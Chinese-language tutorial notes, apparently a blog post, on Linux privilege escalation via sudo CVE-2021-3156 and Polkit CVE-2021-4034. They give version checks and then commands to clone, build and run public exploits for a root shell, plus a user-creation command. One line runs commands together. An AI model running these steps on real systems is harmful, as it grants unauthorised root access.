免责声明:本文仅做技术学习与交流...
目录
SUDO(CVE-2021-3156)
影响版本
-判断:
-利用:
Polkit(CVE-2021-4034)
-判断:
-利用:
添加用户
SUDO(CVE-2021-3156)
another: SUDO权限配置不当.
影响版本
由系统的内核和发布版本等等决定...(版本符合基本就拿下)
sudo: 1.8.2 - 1.8.31p2
sudo: 1.9.0 - 1.9.5p1
sudo 命令 sudo --version
-判断:
1-sudo版本判断.
2-命令报错判断:
sudoedit -s / --报错则存在漏洞.
-利用:
git clone https://github.com/blasty/CVE-2021-3156.git
cd CVE-2021-3156
make
chmod a+x sudo-hax-me-a-sandwich
uname -a #查看内核版本
id
#最后的参数自己选:
./sudo-hax-me-a-sandwich 1
-->提权之后的会话就是root权限了
Polkit(CVE-2021-4034)
vulhub/polkit/CVE-2021-4034/README.zh-cn.md at master · vulhub/vulhub · GitHub
漏洞影响2009年5月至今的所有polkit版本.
由于polkit是系统预装工具,所有存在polkit的linux系统均受影响
如:CentOS、Ubuntu、Debian、Redhat、Fedora、Gentoo、Mageia等
-判断:
dpkg -l policykit-1
--有信息就是有.
-利用:
git clone https://github.com/berdav/CVE-2021-4034.git
--没有git命令就自己上传.或wget命令
yum install git
cd CVE-2021-4034/make./cve-2021-4034id
---判断一下--发现没有--->上来就直接干
--上传--打开时用到的权限还是test的,所以就不要直接上传,用wget...
--运行之后没有结果就GG...
添加用户
useradd -d /home/test -m test